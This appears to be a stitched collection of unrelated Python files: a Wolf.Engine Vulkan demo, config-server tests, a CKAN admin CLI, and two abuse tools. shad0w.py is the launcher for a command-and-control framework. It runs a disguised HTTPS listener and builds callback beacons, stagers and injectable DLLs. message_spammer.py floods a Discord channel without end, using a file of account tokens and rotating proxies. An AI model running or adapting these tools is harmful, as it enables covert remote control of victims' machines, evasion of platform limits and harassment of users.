#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._mesh.draw(_cmd, None, 0, False)
self._draw_render_pass.end(_cmd)
_hr = self._draw_command_buffers.end(i)
if _hr:
print "Error on ending command buffer: " + str(i)
break
return _hr
def update(self, pGameTime):
#Update label of gui widget
global _gui
_gui.debug_text = "FPS: " + str(pGameTime.get_frames_per_second()) + "\r\n\r\nFrameTime: " + str(pGameTime.get_elapsed_seconds()) + "\r\n\r\nTotalTime: " + str(pGameTime.get_total_seconds())
def pre_render(self, pGameTime):
_output_window = self._gDevice.output_presentation_window
_frame_index = _output_window.swap_chain_image_index
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
global _gui
_color = _gui.color_dialog.currentColor()
_rgba = [_color.redF(), _color.greenF(), _color.blueF(), _color.alphaF()]
if (self._PushConstantColorEdit[0] != _rgba[0]) or (self._PushConstantColorEdit[1] != _rgba[1]) or (self._PushConstantColorEdit[2] != _rgba[2]) or (self._PushConstantColorEdit[3] != _rgba[3]):
#store the new colour first so the rebuilt command buffers record the updated push constant
self._PushConstantColorEdit = _rgba
self.build_command_buffers()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_wait_dst_stage_mask = [ pyWolf.graphics.w_pipeline_stage_flag_bits.COLOR_ATTACHMENT_OUTPUT_BIT ]
_wait_semaphores = [ _output_window.swap_chain_image_is_available_semaphore ]
_signal_semaphores = [ _output_window.rendering_done_semaphore ]
_cmd = self._draw_command_buffers.get_command_at(_frame_index)
_cmd_buffers = [_cmd]
#reset draw fence
self._draw_fence.reset()
_hr = self._gDevice.submit(_cmd_buffers, self._gDevice.graphics_queue, _wait_dst_stage_mask, _wait_semaphores, _signal_semaphores, self._draw_fence)
if _hr:
print "Error on submit to graphics device"
return
_hr = self._draw_fence.wait()
if _hr:
print "Error on waiting for draw fence"
return
def post_render(self, pSuccessfullyRendered):
if pSuccessfullyRendered == False:
print "Rendered Unsuccessfully"
def run(self):
#run game
_window_info = pyWolf.system.w_window_info()
_window_info.width = self.width()
_window_info.height = self.height()
_window_info.v_sync_enable = False
_window_info.is_full_screen = False
_window_info.swap_chain_format = 44 # BGRA8Unorm in VULKAN
_window_info.cpu_access_swap_chain_buffer = False
# get window handle
pycobject_hwnd = self.winId()
#convert window handle as HWND to unsigned integer pointer for c++
ctypes.pythonapi.PyCObject_AsVoidPtr.restype = ctypes.c_void_p
ctypes.pythonapi.PyCObject_AsVoidPtr.argtypes = [ctypes.py_object]
int_hwnd = ctypes.pythonapi.PyCObject_AsVoidPtr(pycobject_hwnd)
_window_info.set_win_id(int_hwnd)
#initialize game
_map_info = (0, _window_info)
while True:
if self.__exiting:
self.release()
break
self._game.run(_map_info)
print "Game exited"
def showEvent(self, event):
#run in another thread
threading.Thread(target=self.run).start()
event.accept()
def closeEvent(self, event):
self.__exiting = True
event.accept()
def keyPressEvent(self, event):
_key = event.key()
if _key == QtCore.Qt.Key.Key_Escape:
self.__exiting = True
def release(self):
self._draw_fence.release()
self._draw_fence = None
self._draw_semaphore.release()
self._draw_semaphore = None
self._draw_command_buffers.release()
self._draw_command_buffers = None
self._draw_render_pass.release()
self._draw_render_pass = None
self._shader.release()
self._shader = None
self._pipeline.release()
self._pipeline = None
self._mesh.release()
self._mesh = None
self._texture.release()
self._texture = None
self._game.release()
self._game = None
self._gDevice = None
self._viewport = None
self._viewport_scissor = None
if __name__ == '__main__':
# Create a Qt application
_app = QApplication(sys.argv)
#Init gui
_gui = gui()
_gui.resize(screen_width /2, screen_height /2)
_gui.setWindowTitle('Wolf.Engine Debug')
#Init scene
_scene = scene(pyWolfPath + "..\\..\\..\\..\\content\\",
pyWolfPath,
"py_11_pipeline")
_scene.resize(screen_width, screen_height)
_scene.setWindowTitle('Wolf.Engine')
#Show all widgets
_scene.show()
_gui.show()
sys.exit(_app.exec_())
|
test_config_server.py
|
# (C) Copyright 2020- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
#
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
from __future__ import absolute_import, print_function, unicode_literals
import time
import sys
import multiprocessing
import pytest
import requests
from servicelib import compat, utils
from servicelib.config import client
def test_config_server_in_read_write_mode(config_server):
config_server.initial_config = {"foo": 42}
config_server.start()
c = config_server.client
assert c.get("foo") == 42
c.set("foo", 43)
assert c.get("foo") == 43
c.delete("foo")
with pytest.raises(Exception) as exc:
c.get("foo")
assert str(exc.value).startswith("No config value for `foo`")
def test_config_server_in_read_only_mode(config_server):
config_server.initial_config = {"foo": 42}
config_server.read_only = True
config_server.start()
c = config_server.client
assert c.get("foo") == 42
with pytest.raises(Exception) as exc:
c.set("foo", 43)
assert str(exc.value) == "Config server in read-only mode"
assert c.get("foo") == 42
with pytest.raises(Exception) as exc:
c.delete("foo")
assert str(exc.value) == "Config server in read-only mode"
assert c.get("foo") == 42
def test_client_uses_cached_values_when_server_is_down(config_server):
config_server.initial_config = {"foo": 42}
config_server.start()
assert config_server.client.get("foo") == 42
config_server.stop()
with pytest.raises(requests.ConnectionError):
requests.get(config_server.client.url)
time.sleep(config_server.client.poll_interval + 1)
assert config_server.client.get("foo") == 42
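# The test above relies on the client's local cache: a value fetched while the
# server was up is still served after the server goes down, even once
# poll_interval has elapsed.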
def test_client_needs_cached_values_when_server_is_down(config_server):
config_server.stop()
with pytest.raises(requests.ConnectionError):
requests.get(config_server.client.url)
with pytest.raises(requests.ConnectionError):
config_server.client.get("foo")
config_server.initial_config = {"foo": 42}
config_server.start()
assert config_server.client.get("foo") == 42
def test_settings_change_in_child_process(config_server):
config_server.start()
if compat.PY3:
ctx = multiprocessing.get_context("fork")
else:
ctx = multiprocessing
parent_conn, child_conn = ctx.Pipe()
def child(conn):
c = client.instance(url=config_server.url)
while True:
try:
msg = conn.recv()
if msg == "quit":
return
conn.send(c.get(msg))
except Exception as exc:
print(exc, file=sys.stderr)
sys.stderr.flush()
config_server.client.set("foo", 42)
p = ctx.Process(target=child, args=(child_conn,))
p.start()
try:
parent_conn.send("foo")
assert parent_conn.recv() == 42
config_server.client.set("foo", 43)
time.sleep(config_server.client.poll_interval + 1)
parent_conn.send("foo")
assert parent_conn.recv() == 43
finally:
parent_conn.send("quit")
p.join()
@pytest.mark.parametrize("invalid_key", ["", None])
def test_set_with_invalid_key(config_server, invalid_key):
with pytest.raises(ValueError) as exc:
config_server.client.set(invalid_key, 42)
assert str(exc.value) == "Invalid key `{}`".format(invalid_key)
def test_delete_entry(config_server):
config_server.initial_config = {"foo": 42}
config_server.start()
c = config_server.client
assert c.get("foo") == 42
with pytest.raises(KeyError):
c.delete("no-such-key")
c.delete("foo")
with pytest.raises(Exception) as exc:
c.get("foo")
assert str(exc.value).startswith("No config value for `foo`")
def test_health_endpoint(config_server):
config_server.start()
res = config_server.http_get("/health")
assert res.status_code == 200
def test_run_in_foreground(config_server):
config_server.initial_config = {"foo": 42}
config_server.start(background=False)
utils.wait_for_url(config_server.url)
assert config_server.client.get("foo") == 42
def test_empty_post_request(config_server):
config_server.initial_config = {"foo": 42}
config_server.start()
res = config_server.http_post(
"/settings/foo", headers={"content-type": "application/json"}
)
assert res.status_code == 200
assert config_server.client.get("foo") == 42
def test_error_saving_config(config_server):
config_server.initial_config = {"foo": 42}
config_server.start()
c = config_server.client
assert c.get("foo") == 42
config_server.config_file.parent.chmod(0o555)
try:
with pytest.raises(Exception) as exc:
c.set("foo", 43)
assert "Cannot save config" in str(exc.value)
assert c.get("foo") == 42
with pytest.raises(Exception) as exc:
c.delete("foo")
assert "Cannot save config" in str(exc.value)
assert c.get("foo") == 42
finally:
config_server.config_file.parent.chmod(0o755)
|
shad0w.py
|
#!/usr/bin/env python3
import os
import sys
import ssl
import socket
import asyncio
import argparse
from threading import Thread
from lib import debug
from lib import banner
from lib import http_server
from lib import console
from lib import encryption
from lib import buildtools
from lib import mirror
from lib import payload_format
from lib import tools
class Shad0wC2(object):
def __init__(self, args):
super(Shad0wC2, self).__init__()
# payload store
self.payloads = {}
# declare all the vital variables needed to run.
self.addr = (args['address'], args['port'])
self.debugv = args['debug']
self.sslkey = args['key']
self.sslcrt = args['cert']
# framework variables
self.variables = {}
# set the msf callback size
self.variables["MsfUriSize"] = 1337
# website we can mirror
self.mirror = args['mirror']
# endpoint for modules to callback to
self.endpoint = args['endpoint']
# runtime variables
self.beacons = {}
self.beacon_count = 0
self.current_beacon = None
# loading screen stuff
self.screen_finish = False
# get the debug/logging stuff ready
self.debug = debug.Debug(self.debugv)
# console class
self.console = console.Console(self)
# super useful
self.crypt = encryption
def start(self):
# mirror a website if we need to
if self.mirror is not None:
mirror.mirror_site(self, self.mirror)
# compile the payloads, this makes execution of modules quicker
self.compile_finished = False
# start the loading banner
Thread(target=tools.loading_banner, args=(self,)).start()
# start to do the compiling
asyncio.run(tools.compile_and_store_static(self))
asyncio.run(tools.compile_and_store_static_srdi(self))
# make sure we are in the rootdir
os.chdir("/root/shad0w")
# make sure the loading screen has finished
while self.screen_finish != True:
pass
# show the banner
banner.Banner()
# start the http server thread
# self.debug.log("starting http server thread")
thttp = Thread(target=http_server.run_serv, args=(self,))
thttp.daemon = True
thttp.start()
# asyncio.run(http_server.run_serv(self))
# start the console
asyncio.run(self.console.start())
# tconsole = Thread(target=self.console.start)
# tconsole.daemon = False
# tconsole.start()
class Shad0wBuilder(object):
def __init__(self, args):
super(Shad0wBuilder, self).__init__()
# key variables for the build
self.address = args['address']
self.port = args['port']
self.jitter = args['jitter']
self.format = args['format']
self.outfile = args['out']
self.debugv = args['debug']
self.payload = args['payload']
self.no_shrink = args['no_shrink']
# get the debug/logging stuff ready
self.debug = debug.Debug(self.debugv)
def build(self):
# get the variables for the make
self.arch, self.platform, self.secure, self.static = buildtools.get_payload_variables(self.payload)
# copy the correct source files into build directory
if self.static is not None:
# then we are building a static beacon
# what type we need?
if self.format == "exe":
buildtools.clone_source_files(asm=True)
else:
buildtools.clone_source_files(asm=True, rootdir="injectable")
if self.static is None:
# then we are building a stager
buildtools.clone_source_files(asm=True, rootdir="stager")
# change the settings file based on the args we have been given
buildtools.update_settings_file(self)
# now we need to run 'make' inside the cloned dir
if self.format == "dll":
buildtools.make_in_clone(arch=self.arch, platform=self.platform, secure=self.secure, static=self.static, debug=self.debugv, modlocation="/root/shad0w/beacon/beacon.dll")
else:
buildtools.make_in_clone(arch=self.arch, platform=self.platform, secure=self.secure, static=self.static, debug=self.debugv)
length = payload_format.create(self)
if length != False:
print("\033[1;32m[+]\033[0m", f"Created {self.outfile} ({length} bytes)")
if __name__ == '__main__':
# parse the first cmd switch to decide whether we beacon or listen
parser = argparse.ArgumentParser(prog='shad0w')
subparsers = parser.add_subparsers(dest='mode', help='shad0w C2 functions')
listen_parser = subparsers.add_parser('listen', help="Tell shad0w to listen for connections")
beacon_parser = subparsers.add_parser('beacon', help="Tell shad0w to create a beacon")
update_parser = subparsers.add_parser('update', help="Update shad0w")
listen_parser.add_argument("-a", "--address", required=False, default="0.0.0.0", help="Address shad0w will listen on (default will be 0.0.0.0)")
listen_parser.add_argument("-p", "--port", required=False, default=443, help="Port the C2 will bind to (default is 443)")
listen_parser.add_argument("-k", "--key", required=False, default="certs/key.pem", help="Private key for the HTTPS server")
listen_parser.add_argument("-c", "--cert", required=False, default="certs/cert.pem", help="Certificate for the HTTPS server")
listen_parser.add_argument("-m", "--mirror", required=False, default=None, help="Website to mirror for if a client connects to the C2 via a web browser")
listen_parser.add_argument("-d", "--debug", required=False, action='store_true', help="Start debug mode")
listen_parser.add_argument("-e", "--endpoint", required=False, default=None, help="The endpoint shad0w modules will callback to")
beacon_parser.add_argument("-p", "--payload", required=True, help="Beacon payload to use")
beacon_parser.add_argument("-H", "--address", required=True, help="Address the beacon will connect to")
beacon_parser.add_argument("-P", "--port", required=False, default=443, help="Port the beacon will connect on")
beacon_parser.add_argument("-j", "--jitter", required=False, default=1, type=int, help="Jitter the beacon should use when connecting back")
beacon_parser.add_argument("-f", "--format", required=True, choices=payload_format.formats, help="Format to store the beacon payload as")
beacon_parser.add_argument("-o", "--out", required=True, help="File to store the beacon in")
beacon_parser.add_argument("-n", "--no-shrink", required=False, action='store_true', help="Leave the file at its final size, do not attempt to shrink it")
beacon_parser.add_argument("-d", "--debug", required=False, action='store_true', help="Start debug mode")
# parse the args
args = vars(parser.parse_args())
# first check if we need to update
if args["mode"] == "update":
print("Updating...")
os.system("git pull")
# set the arguments for the listen
if args["mode"] == "listen":
shad0w = Shad0wC2(args)
asyncio.run(shad0w.start())
# set the arguments for creating the beacon
if args["mode"] == "beacon":
# build the beacon
shad0w = Shad0wBuilder(args)
shad0w.build()
|
message_spammer.py
|
import requests , threading , random , time
from colorama import Fore , Style
"""
Developed by CRYONICX
All responsibility for the project is on you.
DISCORD = CRYONICX#9999 ID = 788124670556766209
"""
class Message_spammer:
def __init__(self, token , channel_id ,message):
liste = [""]
self.message = message
self.channel = channel_id
self.token = token[:-2]
for x in liste:
self.headers = {'Authorization': self.token}
def send_message(self):
s = requests.session()
proxy = set()
with open("./config/proxy.txt", "r") as f:
file_lines1 = f.readlines()
proxy_count = len(file_lines1)
for line1 in file_lines1:
proxy.add(line1.strip())
if proxy_count != 0:
proxies = {
'http': 'http://'+random.choice(list(proxy))
}
r = requests.post(f"https://discord.com/api/v9/channels/{self.channel}",headers=self.headers , json={'content-type:': "application/json" , 'content' : self.message} , proxies=proxies)
print(f"{Fore.GREEN} [✔] Spamming.{Style.RESET_ALL}" if r else f"{Fore.RED}[X] Failed. {Style.RESET_ALL}")
else:
r = requests.post(f"https://discord.com/api/v9/channels/{self.channel}",headers=self.headers , json={'content-type:': "application/json" , 'content' : self.message})
print(f"{Fore.GREEN} [✔] Spamming.{Style.RESET_ALL}" if r else f"{Fore.RED}[X] Failed.{Style.RESET_ALL}")
return r
def worker(token , message , channel):
lines = []
with open('./config/tokens.txt') as f:
lines = f.readlines()
e = Message_spammer(token , message , channel)
while True:
e.send_message()
def main():
channel_id_input = input(
f"{Fore.BLUE}{Style.BRIGHT}[?] Enter the id of the channel you are spamming > {Style.RESET_ALL}")
if len(channel_id_input) != 18:
print(f"{Fore.RED}[!] Invalid id {Style.RESET_ALL}")
time.sleep(2)
quit()
message_content = input(
f"{Fore.BLACK}{Style.BRIGHT}[?] Type the message you want to spam > {Style.RESET_ALL}")
lines = []
with open('./config/tokens.txt') as f:
lines = f.readlines()
threads = []
for i in lines:
t = threading.Thread(target=worker, args=(i , channel_id_input ,message_content,))
threads.append(t)
t.start()
if __name__ == '__main__':
main()
|
cli.py
|
import collections
import csv
import multiprocessing as mp
import os
import datetime
import sys
from pprint import pprint
import re
import ckan.logic as logic
import ckan.model as model
import ckan.include.rjsmin as rjsmin
import ckan.include.rcssmin as rcssmin
import ckan.lib.fanstatic_resources as fanstatic_resources
import sqlalchemy as sa
import urlparse
import routes
import paste.script
from paste.registry import Registry
from paste.script.util.logging_config import fileConfig
#NB No CKAN imports are allowed until after the config file is loaded.
# i.e. do the imports in methods, after _load_config is called.
# Otherwise loggers get disabled.
def parse_db_config(config_key='sqlalchemy.url'):
''' Takes a config key for a database connection url and parses it into
a dictionary. Expects a url like:
'postgres://tester:pass@localhost/ckantest3'
'''
from pylons import config
url = config[config_key]
regex = [
'^\s*(?P<db_type>\w*)',
'://',
'(?P<db_user>[^:]*)',
':?',
'(?P<db_pass>[^@]*)',
'@',
'(?P<db_host>[^/:]*)',
':?',
'(?P<db_port>[^/]*)',
'/',
'(?P<db_name>[\w.-]*)'
]
db_details_match = re.match(''.join(regex), url)
if not db_details_match:
raise Exception('Could not extract db details from url: %r' % url)
db_details = db_details_match.groupdict()
return db_details
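# Illustrative example (hypothetical values): parse_db_config() on
# 'postgres://tester:pass@localhost/ckantest3' returns
# {'db_type': 'postgres', 'db_user': 'tester', 'db_pass': 'pass',
#  'db_host': 'localhost', 'db_port': '', 'db_name': 'ckantest3'}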
class MockTranslator(object):
def gettext(self, value):
return value
def ugettext(self, value):
return value
def ungettext(self, singular, plural, n):
if n > 1:
return plural
return singular
class CkanCommand(paste.script.command.Command):
'''Base class for classes that implement CKAN paster commands to inherit.
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
parser.add_option('-c', '--config', dest='config',
default='development.ini', help='Config file to use.')
parser.add_option('-f', '--file',
action='store',
dest='file_path',
help="File to dump results to (if needed)")
default_verbosity = 1
group_name = 'ckan'
def _get_config(self):
from paste.deploy import appconfig
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
return appconfig('config:' + self.filename)
def _load_config(self):
conf = self._get_config()
assert 'ckan' not in dir() # otherwise loggers would be disabled
# We have now loaded the config. Now we can import ckan for the
# first time.
from ckan.config.environment import load_environment
load_environment(conf.global_conf, conf.local_conf)
self.registry=Registry()
self.registry.prepare()
import pylons
self.translator_obj = MockTranslator()
self.registry.register(pylons.translator, self.translator_obj)
if model.user_table.exists():
# If the DB has already been initialized, create and register
# a pylons context object, and add the site user to it, so the
# auth works as in a normal web request
c = pylons.util.AttribSafeContextObj()
self.registry.register(pylons.c, c)
self.site_user = logic.get_action('get_site_user')({'ignore_auth': True,
'defer_commit': True}, {})
pylons.c.user = self.site_user['name']
pylons.c.userobj = model.User.get(self.site_user['name'])
model.repo.commit_and_remove()
## give routes enough information to run url_for
parsed = urlparse.urlparse(conf.get('ckan.site_url', 'http://0.0.0.0'))
request_config = routes.request_config()
request_config.host = parsed.netloc + parsed.path
request_config.protocol = parsed.scheme
def _setup_app(self):
cmd = paste.script.appinstall.SetupCommand('setup-app')
cmd.run([self.filename])
class ManageDb(CkanCommand):
'''Perform various tasks on the database.
db create - alias of db upgrade
db init - create and put in default data
db clean
db upgrade [version no.] - Data migrate
db version - returns current version of data schema
db dump FILE_PATH - dump to a pg_dump file
db dump-rdf DATASET_NAME FILE_PATH
db simple-dump-csv FILE_PATH - dump just datasets in CSV format
db simple-dump-json FILE_PATH - dump just datasets in JSON format
db user-dump-csv FILE_PATH - dump user information to a CSV file
db send-rdf TALIS_STORE USERNAME PASSWORD
db load FILE_PATH - load a pg_dump from a file
db load-only FILE_PATH - load a pg_dump from a file but don\'t do
the schema upgrade or search indexing
db create-from-model - create database from the model (indexes not made)
db migrate-filestore - migrate all uploaded data from the 2.1 filestore.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
import ckan.lib.search as search
cmd = self.args[0]
if cmd == 'init':
model.repo.init_db()
if self.verbose:
print 'Initialising DB: SUCCESS'
elif cmd == 'clean' or cmd == 'drop':
# remove any *.pyc version files to prevent conflicts
v_path = os.path.join(os.path.dirname(__file__),
'..', 'migration', 'versions', '*.pyc')
import glob
filelist = glob.glob(v_path)
for f in filelist:
os.remove(f)
model.repo.clean_db()
search.clear()
if self.verbose:
print 'Cleaning DB: SUCCESS'
elif cmd == 'upgrade':
if len(self.args) > 1:
model.repo.upgrade_db(self.args[1])
else:
model.repo.upgrade_db()
elif cmd == 'version':
self.version()
elif cmd == 'dump':
self.dump()
elif cmd == 'load':
self.load()
elif cmd == 'load-only':
self.load(only_load=True)
elif cmd == 'simple-dump-csv':
self.simple_dump_csv()
elif cmd == 'simple-dump-json':
self.simple_dump_json()
elif cmd == 'dump-rdf':
self.dump_rdf()
elif cmd == 'user-dump-csv':
self.user_dump_csv()
elif cmd == 'create-from-model':
model.repo.create_db()
if self.verbose:
print 'Creating DB: SUCCESS'
elif cmd == 'send-rdf':
self.send_rdf()
elif cmd == 'migrate-filestore':
self.migrate_filestore()
else:
print 'Command %s not recognized' % cmd
sys.exit(1)
def _get_db_config(self):
return parse_db_config()
def _get_postgres_cmd(self, command):
self.db_details = self._get_db_config()
if self.db_details.get('db_type') not in ('postgres', 'postgresql'):
raise AssertionError('Expected postgres database - not %r' % self.db_details.get('db_type'))
pg_cmd = command
pg_cmd += ' -U %(db_user)s' % self.db_details
if self.db_details.get('db_pass') not in (None, ''):
pg_cmd = 'export PGPASSWORD=%(db_pass)s && ' % self.db_details + pg_cmd
if self.db_details.get('db_host') not in (None, ''):
pg_cmd += ' -h %(db_host)s' % self.db_details
if self.db_details.get('db_port') not in (None, ''):
pg_cmd += ' -p %(db_port)s' % self.db_details
return pg_cmd
def _get_psql_cmd(self):
psql_cmd = self._get_postgres_cmd('psql')
psql_cmd += ' -d %(db_name)s' % self.db_details
return psql_cmd
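# Illustrative example (hypothetical values): with db_user=tester, db_pass=pass,
# db_host=localhost and db_name=ckantest3 this builds roughly
#   export PGPASSWORD=pass && psql -U tester -h localhost -d ckantest3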
def _postgres_dump(self, filepath):
pg_dump_cmd = self._get_postgres_cmd('pg_dump')
pg_dump_cmd += ' %(db_name)s' % self.db_details
pg_dump_cmd += ' > %s' % filepath
self._run_cmd(pg_dump_cmd)
print 'Dumped database to: %s' % filepath
def _postgres_load(self, filepath):
import ckan.model as model
assert not model.repo.are_tables_created(), "Tables already found. You need to 'db clean' before a load."
pg_cmd = self._get_psql_cmd() + ' -f %s' % filepath
self._run_cmd(pg_cmd)
print 'Loaded CKAN database: %s' % filepath
def _run_cmd(self, command_line):
import subprocess
retcode = subprocess.call(command_line, shell=True)
if retcode != 0:
raise SystemError('Command exited with errorcode: %i' % retcode)
def dump(self):
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
self._postgres_dump(dump_path)
def load(self, only_load=False):
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
self._postgres_load(dump_path)
if not only_load:
print 'Upgrading DB'
import ckan.model as model
model.repo.upgrade_db()
print 'Rebuilding search index'
import ckan.lib.search
ckan.lib.search.rebuild()
else:
print 'Now remember you have to call \'db upgrade\' and then \'search-index rebuild\'.'
print 'Done'
def simple_dump_csv(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need csv file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.SimpleDumper().dump(dump_file, format='csv')
def simple_dump_json(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need json file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.SimpleDumper().dump(dump_file, format='json')
def dump_rdf(self):
if len(self.args) < 3:
print 'Need dataset name and rdf file path'
return
package_name = self.args[1]
rdf_path = self.args[2]
import ckan.model as model
import ckan.lib.rdf as rdf
pkg = model.Package.by_name(unicode(package_name))
if not pkg:
print 'Dataset name "%s" does not exist' % package_name
return
rdf = rdf.RdfExporter().export_package(pkg)
f = open(rdf_path, 'w')
f.write(rdf)
f.close()
def user_dump_csv(self):
if len(self.args) < 2:
print 'Need csv file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.UserDumper().dump(dump_file)
def send_rdf(self):
if len(self.args) < 4:
print 'Need all arguments: {talis-store} {username} {password}'
return
talis_store = self.args[1]
username = self.args[2]
password = self.args[3]
import ckan.lib.talis
talis = ckan.lib.talis.Talis()
return talis.send_rdf(talis_store, username, password)
def migrate_filestore(self):
from ckan.model import Session
import requests
from ckan.lib.uploader import ResourceUpload
results = Session.execute("select id, revision_id, url from resource "
"where resource_type = 'file.upload' "
"and (url_type <> 'upload' or url_type is null)"
"and url like '%storage%'")
for id, revision_id, url in results:
response = requests.get(url, stream=True)
if response.status_code != 200:
print "failed to fetch %s (code %s)" % (url,
response.status_code)
continue
resource_upload = ResourceUpload({'id': id})
assert resource_upload.storage_path, "no storage configured aborting"
directory = resource_upload.get_directory(id)
filepath = resource_upload.get_path(id)
try:
os.makedirs(directory)
except OSError, e:
## errno 17 is file already exists
if e.errno != 17:
raise
with open(filepath, 'wb+') as out:
for chunk in response.iter_content(1024):
if chunk:
out.write(chunk)
Session.execute("update resource set url_type = 'upload'"
"where id = '%s'" % id)
Session.execute("update resource_revision set url_type = 'upload'"
"where id = '%s' and "
"revision_id = '%s'" % (id, revision_id))
Session.commit()
print "Saved url %s" % url
def version(self):
from ckan.model import Session
print Session.execute('select version from migrate_version;').fetchall()
class SearchIndexCommand(CkanCommand):
'''Creates a search index for all datasets
Usage:
search-index [-i] [-o] [-r] [-e] rebuild [dataset_name] - reindex dataset_name if given, if not then rebuild
full search index (all datasets)
search-index rebuild_fast - reindex with multiprocessing, using all cores.
This acts in the same way as rebuild -r [EXPERIMENTAL]
search-index check - checks for datasets not indexed
search-index show DATASET_NAME - shows index of a dataset
search-index clear [dataset_name] - clears the search index for the provided dataset or
for the whole ckan instance
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def __init__(self,name):
super(SearchIndexCommand,self).__init__(name)
self.parser.add_option('-i', '--force', dest='force',
action='store_true', default=False, help='Ignore exceptions when rebuilding the index')
self.parser.add_option('-o', '--only-missing', dest='only_missing',
action='store_true', default=False, help='Index non indexed datasets only')
self.parser.add_option('-r', '--refresh', dest='refresh',
action='store_true', default=False, help='Refresh current index (does not clear the existing one)')
self.parser.add_option('-e', '--commit-each', dest='commit_each',
action='store_true', default=False, help=
'''Perform a commit after indexing each dataset. This ensures that changes are
immediately available on the search, but slows significantly the process.
Default is false.'''
)
def command(self):
if not self.args:
# default to printing help
print self.usage
return
cmd = self.args[0]
# Do not run load_config yet
if cmd == 'rebuild_fast':
self.rebuild_fast()
return
self._load_config()
if cmd == 'rebuild':
self.rebuild()
elif cmd == 'check':
self.check()
elif cmd == 'show':
self.show()
elif cmd == 'clear':
self.clear()
else:
print 'Command %s not recognized' % cmd
def rebuild(self):
from ckan.lib.search import rebuild, commit
# BY default we don't commit after each request to Solr, as it is
# a really heavy operation and slows things a lot
if len(self.args) > 1:
rebuild(self.args[1])
else:
rebuild(only_missing=self.options.only_missing,
force=self.options.force,
refresh=self.options.refresh,
defer_commit=(not self.options.commit_each))
if not self.options.commit_each:
commit()
def check(self):
from ckan.lib.search import check
check()
def show(self):
from ckan.lib.search import show
if not len(self.args) == 2:
print 'Missing parameter: dataset-name'
return
index = show(self.args[1])
pprint(index)
def clear(self):
from ckan.lib.search import clear
package_id =self.args[1] if len(self.args) > 1 else None
clear(package_id)
def rebuild_fast(self):
### Get out config but without starting pylons environment ####
conf = self._get_config()
### Get ids using own engine, otherwise multiprocess will balk
db_url = conf['sqlalchemy.url']
engine = sa.create_engine(db_url)
package_ids = []
result = engine.execute("select id from package where state = 'active';")
for row in result:
package_ids.append(row[0])
def start(ids):
## load the actual environment for each subprocess, so each has its own
## sa session
self._load_config()
from ckan.lib.search import rebuild, commit
rebuild(package_ids=ids)
commit()
def chunks(l, n):
""" Yield n successive chunks from l.
"""
newn = int(len(l) / n)
for i in xrange(0, n-1):
yield l[i*newn:i*newn+newn]
yield l[n*newn-newn:]
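# Split the active package ids into one chunk per CPU core and reindex each
# chunk in its own process; each subprocess loads its own config and
# SQLAlchemy session via start() above.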
processes = []
for chunk in chunks(package_ids, mp.cpu_count()):
process = mp.Process(target=start, args=(chunk,))
processes.append(process)
process.daemon = True
process.start()
for process in processes:
process.join()
class Notification(CkanCommand):
'''Send out modification notifications.
In "replay" mode, an update signal is sent for each dataset in the database.
Usage:
notify replay - send out modification signals
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan.model import Session, Package, DomainObjectOperation
from ckan.model.modification import DomainObjectModificationExtension
if not self.args:
# default to run
cmd = 'replay'
else:
cmd = self.args[0]
if cmd == 'replay':
dome = DomainObjectModificationExtension()
for package in Session.query(Package):
dome.notify(package, DomainObjectOperation.changed)
else:
print 'Command %s not recognized' % cmd
class RDFExport(CkanCommand):
'''Export active datasets as RDF
This command dumps out all currently active datasets as RDF into the
specified folder.
Usage:
paster rdf-export /path/to/store/output
'''
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
self._load_config()
if not self.args:
# default to run
print RDFExport.__doc__
else:
self.export_datasets( self.args[0] )
def export_datasets(self, out_folder):
'''
Export datasets as RDF to an output folder.
'''
import urlparse
import urllib2
import pylons.config as config
import ckan.model as model
import ckan.logic as logic
import ckan.lib.helpers as h
# Create output folder if not exists
if not os.path.isdir( out_folder ):
os.makedirs( out_folder )
fetch_url = config['ckan.site_url']
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
dataset_names = logic.get_action('package_list')(context, {})
for dataset_name in dataset_names:
dd = logic.get_action('package_show')(context, {'id':dataset_name })
if not dd['state'] == 'active':
continue
url = h.url_for( controller='package',action='read',
id=dd['name'])
url = urlparse.urljoin(fetch_url, url[1:]) + '.rdf'
try:
fname = os.path.join( out_folder, dd['name'] ) + ".rdf"
r = urllib2.urlopen(url).read()
with open(fname, 'wb') as f:
f.write(r)
except IOError, ioe:
sys.stderr.write( str(ioe) + "\n" )
class Sysadmin(CkanCommand):
'''Gives sysadmin rights to a named user
Usage:
sysadmin - lists sysadmins
sysadmin list - lists sysadmins
sysadmin add USERNAME - add a user as a sysadmin
sysadmin remove USERNAME - removes user from sysadmins
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0] if self.args else None
if cmd == None or cmd == 'list':
self.list()
elif cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
else:
print 'Command %s not recognized' % cmd
